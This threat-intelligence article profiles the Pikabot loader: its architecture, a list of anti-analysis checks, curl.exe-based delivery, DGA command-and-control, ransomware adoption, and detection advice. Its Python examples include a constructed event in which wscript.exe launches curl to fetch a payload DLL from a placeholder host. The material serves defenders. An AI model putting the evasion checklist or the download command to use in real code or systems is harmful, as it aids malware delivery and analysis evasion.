Pikabot: The Loader That Filled Qakbot's Void
Threat Intelligence
Pikabot emerged weeks after Qakbot's August 2023 takedown with a two-component architecture and aggressive anti-analysis that signaled professional development. Ransomware affiliates adopted it within months.
By Arjun Raghavan, Security & Systems Lead, BIPI · September 15, 2024 · 10 min read
When Operation Duck Hunt dismantled Qakbot in August 2023, it left a vacuum in the ransomware affiliate ecosystem. Qakbot had been the preferred initial access mechanism for several major ransomware groups, and its sudden absence created immediate demand for a replacement. Pikabot, first observed in early 2023 and expanding rapidly after the Qakbot takedown, positioned itself as exactly that replacement. Its technical architecture and the speed of its adoption both suggest it was not an opportunistic newcomer but a prepared successor.
Two-Component Architecture
Pikabot's distinguishing technical characteristic is its strict separation between a loader component and a core module. Most loaders bundle these functions together; Pikabot keeps them separate to the point where loader and core communicate over a local named pipe, and the core refuses to run if it detects that it was launched directly rather than through the loader's pipe handshake. This design makes sandbox analysis significantly harder: a sandbox that captures the core module and re-executes it in isolation simply sees it exit immediately.
- Loader component: responsible for anti-analysis checks, decrypting the core, injecting it into a host process
- Core module: handles C2 communication, command processing, and payload staging
- Handshake: loader passes a validation token to core via named pipe; core exits if token is absent or incorrect
- Injection target: loader injects core into a suspended legitimate process (WerFault.exe or svchost.exe)
Anti-Analysis: Depth and Breadth
Pikabot implements one of the most comprehensive anti-analysis suites seen in a commodity loader. Researchers from Elastic Security and the DFIR Report documented over a dozen distinct evasion checks in early samples. The checks are not simply sequential; they use junk code and control-flow flattening to make static analysis expensive, and the actual evasion logic is dispersed throughout hundreds of functions rather than centralized in a single 'anti-debug' routine.
- System language check: exits if GetUserDefaultLocaleName returns a language associated with CIS countries (Russian, Belarusian, Ukrainian, Kazakh, etc.)
- Debugger detection: checks NtQueryInformationProcess for DebugPort, NtGlobalFlag, and heap flags
- Hardware breakpoint detection via thread context inspection
- Timing check: uses RDTSC instruction pairs to detect single-step debugging
- Process enumeration: hashes running process names and checks against a list of analysis tool hashes
- VM detection: queries WMI for Win32_ComputerSystem manufacturer field; exits on VMware, VirtualBox, QEMU strings
- Minimum core count: exits if fewer than 4 logical processors are reported
- Control-flow flattening: all functions are dispatched through a central switch statement, making conventional control-flow graph (CFG) analysis largely uninformative
The CIS language exclusion is a standard feature in Russian-nexus malware, serving both as operational security (avoid infecting Russian speakers who might report to local authorities) and as a crude geofencing mechanism. Its presence in Pikabot is a meaningful attribution signal.
Delivery Mechanism
Pikabot delivery campaigns observed in late 2023 used thread-hijacked phishing emails, directly mirroring the Qakbot playbook. The attachment or link delivers a .zip file containing a malicious JavaScript file. The JavaScript, when executed by wscript.exe, downloads and executes the Pikabot loader DLL via curl.exe (a legitimate Windows system binary since Windows 10 1803). Using curl.exe rather than PowerShell's Invoke-WebRequest allows Pikabot to avoid PowerShell Script Block Logging entirely.
C2 Communication
Pikabot's core module communicates with its C2 infrastructure over HTTPS using TLS 1.3. The initial beacon encodes the victim's system fingerprint (hostname, username, OS version, hardware profile hash) in a JSON body encrypted with RSA before TLS encryption, providing an extra layer of confidentiality that persists even if TLS is intercepted. C2 domains are generated using a domain generation algorithm (DGA) seeded with the current date, meaning the active C2 address changes daily and blocklisting known domains has limited effectiveness beyond the current day.
Ransomware Affiliate Adoption
- Black Basta: confirmed Pikabot usage in multiple intrusions documented by the DFIR Report (Q4 2023)
- Ransomhouse: Pikabot observed as precursor in at least two confirmed intrusions
- Post-access TTPs mirror Qakbot playbook: BloodHound enumeration, credential dumping, Cobalt Strike, then ransomware
- Dwell time before ransomware: median 48-72 hours in observed incidents, shorter than Qakbot's historical median
Detection
- Alert on curl.exe spawned by wscript.exe or cscript.exe with arguments pointing to external URLs
- Process: WerFault.exe or svchost.exe with parent processes other than their legitimate parents
- Named pipe: monitor for named pipe creation by NSIS or script host processes; Pikabot's loader-to-core pipe has a random name but consistent creation timing
- Network: Pikabot DGA domains follow a pattern (random-seeming but consistent-length hostnames under .com and .net TLDs registered within the last 7 days)
- YARA: Elastic Security published Pikabot YARA rules in October 2023 covering both the loader and core components
- Memory: look for WerFault.exe with executable memory regions not associated with any loaded module
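The two process-tree detections above (script host spawning curl.exe with a URL, and WerFault.exe/svchost.exe under an unexpected parent), as an added example that is not part of the original article. The events are constructed Sysmon-style process creation records, and the EXPECTED_PARENTS baseline is an assumption to tune for your own environment.

```python
# Added example, not from the original article: the process-tree detections listed
# above, run over constructed Sysmon Event ID 1 (process creation) style records.
# The EXPECTED_PARENTS baseline is an assumption to tune for your own environment.
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
EXPECTED_PARENTS = {  # usual parents of the processes Pikabot injects into (assumed baseline)
    "werfault.exe": {"svchost.exe", "wermgr.exe"},
    "svchost.exe": {"services.exe"},
}
URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of the Pikabot-style indicators a single event matches."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    hits = []
    # Delivery stage: script host launching curl.exe with an external URL argument
    if image == "curl.exe" and parent in SCRIPT_HOSTS and URL_RE.search(event.get("CommandLine", "")):
        hits.append("script_host_curl_download")
    # Injection stage: WerFault.exe / svchost.exe started by something other than its usual parent
    expected = EXPECTED_PARENTS.get(image)
    if expected is not None and parent not in expected:
        hits.append("anomalous_parent_for_injection_target")
    return hits


def scan(events) -> list:
    """(ProcessId, indicator) pairs for every matching event, in log order."""
    return [(e["ProcessId"], hit) for e in events for hit in evaluate(e)]


# Constructed events; paths, PIDs and the URL are illustrative only.
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"curl.exe -o C:\Users\Public\update.dll https://cdn.example.invalid/payload"},
    {"ProcessId": 1104, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\WerFault.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe", "CommandLine": "WerFault.exe"},
    {"ProcessId": 6020, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "curl.exe https://example.invalid/"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only the wscript-spawned curl.exe and the rundll32-spawned WerFault.exe; the interactive curl.exe under explorer.exe is deliberately left alone.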
Remediation
- Block outbound connections from curl.exe, certutil.exe, and bitsadmin.exe via host-based firewall GPO
- Reassign .js file handler to notepad.exe to prevent wscript.exe execution of downloaded JavaScript files
- Enable DNS query logging and alert on DGA-pattern domains (high-entropy, newly registered, under common TLDs)
- Treat any WerFault.exe with anomalous parent process or network activity as a Pikabot indicator and isolate immediately
- If Pikabot is confirmed, initiate a pre-ransomware IR response: assume lateral movement has begun and audit all Active Directory changes in the past 72 hours
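The DGA-pattern DNS alerting described in the Detection and Remediation lists (high-entropy, consistent-length labels under common TLDs, registered within the last 7 days), as an added example that is not part of the original article. The log records, registration dates and scoring thresholds are constructed or assumed, not values published for Pikabot.

```python
# Added example, not from the original article: heuristic scoring of DNS query
# logs for the DGA pattern described above. Log records, registration dates and
# thresholds are constructed/assumed, not values published for Pikabot.
import math
from collections import Counter
from datetime import date
from typing import Optional

COMMON_TLDS = {"com", "net"}  # TLDs the text associates with Pikabot DGA domains
ENTROPY_MIN = 3.2             # bits/char of the registrable label (assumed threshold)
NEW_REG_DAYS = 7              # "registered within the last 7 days" from the text

def shannon_entropy(label: str) -> float:
    """Shannon entropy of a label in bits per character."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())

def registrable_label(qname: str) -> tuple:
    """Return (second-level label, TLD); assumes no country-code second-level domains."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-2], labels[-1]

def score(qname: str, registered: Optional[date], today: date) -> int:
    """1 point for a common TLD, 1 for high entropy, 2 for registration within the window."""
    sld, tld = registrable_label(qname)
    points = int(tld in COMMON_TLDS) + int(shannon_entropy(sld) >= ENTROPY_MIN)
    if registered is not None and 0 <= (today - registered).days <= NEW_REG_DAYS:
        points += 2
    return points

def flag_dga_cluster(records, today: date, min_score=3, min_cluster=3) -> list:
    """Domains to alert on for one host: high-scoring domains that also share a label length,
    which captures the consistent-length property the text describes; one domain alone never fires."""
    candidates = {r["qname"].lower() for r in records
                  if score(r["qname"], r["registered"], today) >= min_score}
    lengths = Counter(len(registrable_label(q)[0]) for q in candidates)
    return sorted(q for q in candidates if lengths[len(registrable_label(q)[0])] >= min_cluster)

# Constructed DNS log for one host; "registered" stands in for a WHOIS/RDAP lookup cache.
TODAY = date(2023, 11, 20)
SAMPLE_LOG = [
    {"qname": "microsoft.com", "registered": date(1991, 5, 2)},
    {"qname": "shopdeals.com", "registered": date(2023, 11, 15)},     # new, but alone and low-entropy
    {"qname": "xq7vbm2kpltz.com", "registered": date(2023, 11, 16)},
    {"qname": "xq7vbm2kpltz.com", "registered": date(2023, 11, 16)},  # repeat query, counted once
    {"qname": "a9fhw3rdnqy5.net", "registered": date(2023, 11, 18)},
    {"qname": "k2mz8tvcjp4e.com", "registered": date(2023, 11, 19)},
    {"qname": "internal.corp.local", "registered": None},             # no registration data
]
```

`flag_dga_cluster(SAMPLE_LOG, TODAY)` returns the three 12-character domains and ignores the lone newly registered dictionary-word domain, which is the behaviour you want before wiring the rule to a blocklist.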